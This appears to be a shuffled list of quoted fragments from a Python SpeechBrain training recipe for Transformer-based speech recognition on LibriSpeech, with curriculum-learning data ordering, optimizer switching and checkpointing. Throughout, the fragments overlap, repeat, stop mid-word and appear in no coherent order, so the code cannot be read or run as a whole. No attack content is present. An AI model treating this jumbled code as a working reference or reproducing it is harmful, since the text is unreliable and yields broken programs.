self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None,", "key_min_value : dict Map from key (in data or in dynamic items) to", "on the training start\"\"\" super().on_fit_start() # if the model is resumed from stage", "valid_search_interval == 0 or ( stage == sb.Stage.TEST ): # Decode token terms", "the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation ==", "order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic` -", "methods for which the default behavior does not match the use case. For", "and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download the", "hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched", "start\"\"\" super().on_fit_start() # if the model is resumed from stage two, reinitialize the", "last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train", "parameters, and will have ``train()``/``eval()`` called on them. opt_class : torch.optim class A", "added to continue training if interrupted. inter_epoch_dataset_updation : bool Whether dataset must be", "is applied, but only on the first n data points found. Meant for", "None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader(", "data ids, filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the", "the result if res == 0: continue else: return res return res shuffled_data_ids", "checkpoint to resume training if interrupted if self.checkpointer is not None: # do", "language model is used on the top of decoder probabilities. The neural network", "Type must be one of random, sorted, weighted_sorted.\" ) # create Dataloader using", "to ignore non-finite losses before stopping. Default: ``3``. noprogressbar (bool) Whether to turn", "elif text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class", "created. If a DataLoader is given, it is used directly. train_loader_kwargs : dict", "> 0 and the distributed_backend is ddp, this will generally handle multiprocess logic,", "1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug", "possible sorting is applied, but only on the first n data points found.", "stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None and not ( isinstance(valid_set, DataLoader)", "through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\":", "hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when", "(initially deep copied from this, so they have the same dynamic items available)", "set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for i, data_id in", "way the filtering and sorting steps don't need to compute the dynamic items", "True def on_fit_start(self): \"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start() #", "in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ):", "limit in key_max_value.items(): if computed[key] <= limit: continue return False for key, func", "with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then #", "print(batch.wrd) # # if cnt == 5: # # exit() # cnt +=", "and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`,", "progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective. Relies on", "# valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with", "= self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch,", "return False for key, func in key_test.items(): if bool(func(computed[key])): continue return False return", "0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss", "the path given in the YAML file). The tokenizer is loaded at the", "if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched", "in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name]", "sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step", ") # when sorting do not shuffle in dataloader ! otherwise is pointless", "\"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], )", "= 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs", "return -1 else: return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two", "data example has weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None", "attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection =", "train-clean 100 rather than the full one), and many other possible variations. Authors", "DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar : bool Whether", ") ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted(", "_random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def", "called at the end of a epoch. This is used to handle ,", "to limit, will only keep data_point if data_point[key] >= limit key_max_value : dict", "* ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding these two methods", "DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time def make_dataloader(", "\"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the datasets objects as well", "data_point[key] >= limit key_max_value : dict Map from key (in data or in", "minutes, default: ``15.0``. If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By", "loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode", "break if ( self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time()", "sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0", "and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if", "): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id", "we create the datasets objects as well as tokenization and encoding train_data, valid_data,", "set of data to use for training. If a Dataset is given, a", "be reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad !=", "checkpoints, in minutes, default: ``15.0``. If non-positive, these are not saved. checkpointer :", "> python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the", "modules are passed to the optimizer by default if they have trainable parameters,", "random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\": pass elif", "None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm(", "str) List of keys in ``modules`` that should be jit compiled. distributed_count (int)", "p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq", "takes only the list of parameters (e.g. a lambda or partial function definition).", "self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder +", "key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2)", "`input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\"", "\"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be one", "100 rather than the full one), and many other possible variations. Authors *", "we only perform beamsearch with limited capacity # and no LM to give", "in dynamic items) to func, will only keep data_point if bool(func(data_point[key])) == True", "Arguments --------- modules : dict of str:torch.nn.Module pairs These modules are passed to", "on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end of a epoch.\"\"\" #", "and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) *", "lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage):", "non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By default, this will be", "descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\")", "filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input", "keys and dynamic items (initially deep copied from this, so they have the", "FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns", "the same dynamic items available) \"\"\" # ordering type can be random, sorted", "# # when sorting do not shuffle in dataloader ! otherwise is pointless", "if self.sortagrad < epoch: # recreate dataset using random shuffling return else: #", "following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters,", "= os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) #", "n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static", "``configure_optimizers()`` method. hparams : dict Each key:value pair should consist of a string", "data to use for training. If a Dataset is given, a DataLoader is", "self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a", "continue return False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys())", "key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2)", ": dict Each key:value pair should consist of a string key and a", "to be updated, the following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()``", "+ (1 - self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch =", "and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in", "= self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss /", "= self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer", "return else: # recreate dataset using preferred cl approach return else: # recreate", "int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not", "order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\"", "= self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST", "+ (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens =", "simple use case (e.g., training a single model with a single dataset) the", "specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs", "based on a Transformer decoder. Beamsearch coupled with a Transformer language model is", "for i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed =", "self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams,", "tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig", "by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: #", "and will have ``train()``/``eval()`` called on them. opt_class : torch.optim class A torch", "res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in", "= load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group with the right", "return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a", "= self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def", "and datasets for the purpose of \"fitting\" a set of modules to a", "and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set,", "a string key and a hyperparameter that is used within the overridden methods.", "``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int) Number of times to ignore", "src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) #", "current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST ): # Decode", "length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif", "if the data example fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items():", "variety of different systems. By properly changing the parameter files, you can try", "stopping. Default: ``3``. noprogressbar (bool) Whether to turn off progressbar when training. Default:", "criteria\"\"\" for key, limit in key_min_value.items(): if computed[key] >= limit: continue return False", "text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts", "if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch", "Arguments --------- epoch_counter : iterable Each call should return an integer indicating the", "- Use curriculum learning for ``n`` number of epochs By default, it is", "self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end", "False for key, limit in key_max_value.items(): if computed[key] <= limit: continue return False", "switch optimizer # if so change the optimizer from Adam to SGD self.check_and_reset_optimizer()", "they have trainable parameters, and will have ``train()``/``eval()`` called on them. opt_class :", "the dataset. ordering_info : str Information to create weights based on pre-defined keys(", "return 0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based", "If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By default, this will", "if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update", "sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech,", "key1, key2 ): \"\"\"Compare two data points based on alphabetic order\"\"\" text1 =", "save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\":", "keys for ordering info can be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info)", "key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or", "train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective.", "with a neural language model. To run this recipe, do the following: >", "= self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats", "training data to speed up training and get better results. # train_data =", "dataset using ``input_length`` in ascending order , tie is broken using ``output_length`` in", "\"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _,", "runs a few batches if self.debug and self.step == self.debug_batches: break if (", "train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): # keys", "# Only show progressbar if requested and main_process enable = progressbar and sb.utils.distributed.if_main_process()", "else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch", "def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text", "cl approach return else: if self.sortagrad != -1: # number of epochs for", "last_ckpt_time = time.time() # Only show progressbar if requested and main_process enable =", "the YAML file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"])", "batch.tokens_bos # Add augmentation if specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"):", "data, but has its own output keys and dynamic items (initially deep copied", "runs a few epochs if self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self,", "sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares", "will only keep data_point if data_point[key] >= limit key_max_value : dict Map from", "final dataset batch_size : 8, int Used to divide the dataset into batches.", "A set of data to use for validation. If a Dataset is given,", "return False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) )", "and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do", "= torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq,", "user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder},", "the labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio", "length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1", "handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def", "is the average of the checkpoints from last 5 epochs. The experiment file", "hparams[\"tokenizer\"] # Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for", "is ordered based on `ordering_info`, divide the dataset into batches of size `batch_size`", "orderings: if order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def", "0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step", "test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i for k,", "``evaluate_batch()`` * ``update_average()`` If the initialization was done with distributed_count > 0 and", "items (initially deep copied from this, so they have the same dynamic items", "of the `Brain` class is the implementation of the ``fit()`` method, which iterates", "batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq,", "# recreate dataset using preferred cl approach return else: if self.sortagrad != -1:", "hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens =", "not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the right optimizer", "feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats", "Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step", "based on pre-defined keys( and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\"", "right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech) from librispeech_prepare", "= [] orderings = dataset_order.split(\",\") for order in orderings: if order.strip() == '':", "updated, the following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments ---------", "predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if", "of size `batch_size` and order these batches randomly to create final dataset batch_size", "preferred cl approach return else: if self.sortagrad != -1: # number of epochs", "used only if `weights` is None batch_selection : str Information on how to", "shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id] = index", "= float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif duration1 < duration2: return", "you can try different encoders, decoders, tokens (e.g, characters instead of BPE), training", "dict Map from key (in data or in dynamic items) to limit, will", "save attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection", "pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc =", "self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the", "end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages according", "\"asc\" else -1 if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key ==", "the full one), and many other possible variations. Authors * <NAME> 2020 *", "frontend and a transformer. The decoder is based on a Transformer decoder. Beamsearch", "# for the sake of efficiency, we only perform beamsearch with limited capacity", "# TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return", "not None, will only keep data_point if weight[data_point] > min_weight max_weight : None,", "will only keep data_point if weight[data_point] > min_weight max_weight : None, int If", "times to ignore non-finite losses before stopping. Default: ``3``. noprogressbar (bool) Whether to", "= torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\",", "max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id", "and sb.utils.distributed.if_main_process(): # report different epoch stages according current stage current_epoch = self.hparams.epoch_counter.current", "keep data_point if weight[data_point] < max_weight weights : None, dict Map from data_id", "random shuffling return else: # recreate dataset using preferred cl approach return else:", "from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset", "token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps", "\"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id", "code runs without crashing. debug_batches (int) Number of batches to run in debug", "* total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for", "ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing", "experiment file is flexible enough to support a large variety of different systems.", "of this based on specified curriculum, shares static data. The reason to implement", "default: ``15.0``. If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By default,", "are run. jit_module_keys (list of str) List of keys in ``modules`` that should", "= not self.noprogressbar # Iterate epochs for epoch in epoch_counter: # Training stage", "Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its", "torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens,", "a set of data. In order to use the ``fit()`` method, one should", "= CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size", "stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs,", "self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: # Create dataset using", "including debug (bool) If ``True``, this will only iterate a few batches for", "\"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key", "None and max_value == None: return weights if isinstance(min_value,int): min_value = float(min_value) if", "i, data_id in enumerate(weights.keys()): if select_n is not None and len(filtered_ids) == select_n:", "predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words = [wrd.split(\"", "data_point if weight[data_point] < max_weight weights : None, dict Map from data_id to", "in random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages", "pass # else: # raise NotImplementedError( # \"sorting must be random, ascending or", "data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain", "output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output", "used on the top of decoder probabilities. The neural network is trained on", "of the evaluation stage # delete the rest of the intermediate checkpoints #", "= self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if ordering_type == \"random\":", "a convolutional frontend and a transformer. The decoder is based on a Transformer", "hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] =", "# Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) #", "datasets, to ensure code runs without crashing. debug_batches (int) Number of batches to", "dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={},", "-1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of", "`sorted`, `reverse-sorted` - Example: * \"random\" - After dataset is ordered based on", "length1 > length2: return 1 elif length1 < length2: return -1 else: return", "= min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise", "``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module pairs These modules are passed", "improve objective. Relies on the existence of multiple functions that can (or should)", "for which curriculum based dataset be used. It can take one of three", "\"te_splits\": hparams[\"test_splits\"], \"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) #", "changed by overriding the ``configure_optimizers()`` method. hparams : dict Each key:value pair should", "self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1 optimizer =", "Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets,", "epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main process self.step", "in a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ):", "process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode", "for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps", "on # # the path given in the YAML file). The tokenizer is", "sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by", "weights_filter(weights,min_value,max_value) filtered_ids = [] for i, data_id in enumerate(weights.keys()): if select_n is not", "self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\":", "dataset_orderings ): \"\"\"Create `weights` for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing", "train_loader (if train_set is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs", "= train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle in", "sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then", "train_set, # initial=0, # dynamic_ncols=True, # disable=False, # ) as t: # cnt", "limit, will only keep data_point if data_point[key] >= limit key_max_value : dict Map", "True if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters())", "units estimated with Byte Pairwise Encoding (BPE) are used as basic recognition tokens.", "import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN", "three values * ``-1`` - Use curriculum learning for all epochs * ``n``", "hyperparameter that is used within the overridden methods. These will be accessible via", "False # elif hparams[\"sorting\"] == \"random\": # pass # else: # raise NotImplementedError(", "dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self,", "== sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID: hyps = None current_epoch", "methods is done. For more complicated use cases, such as multiple modules that", "elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", 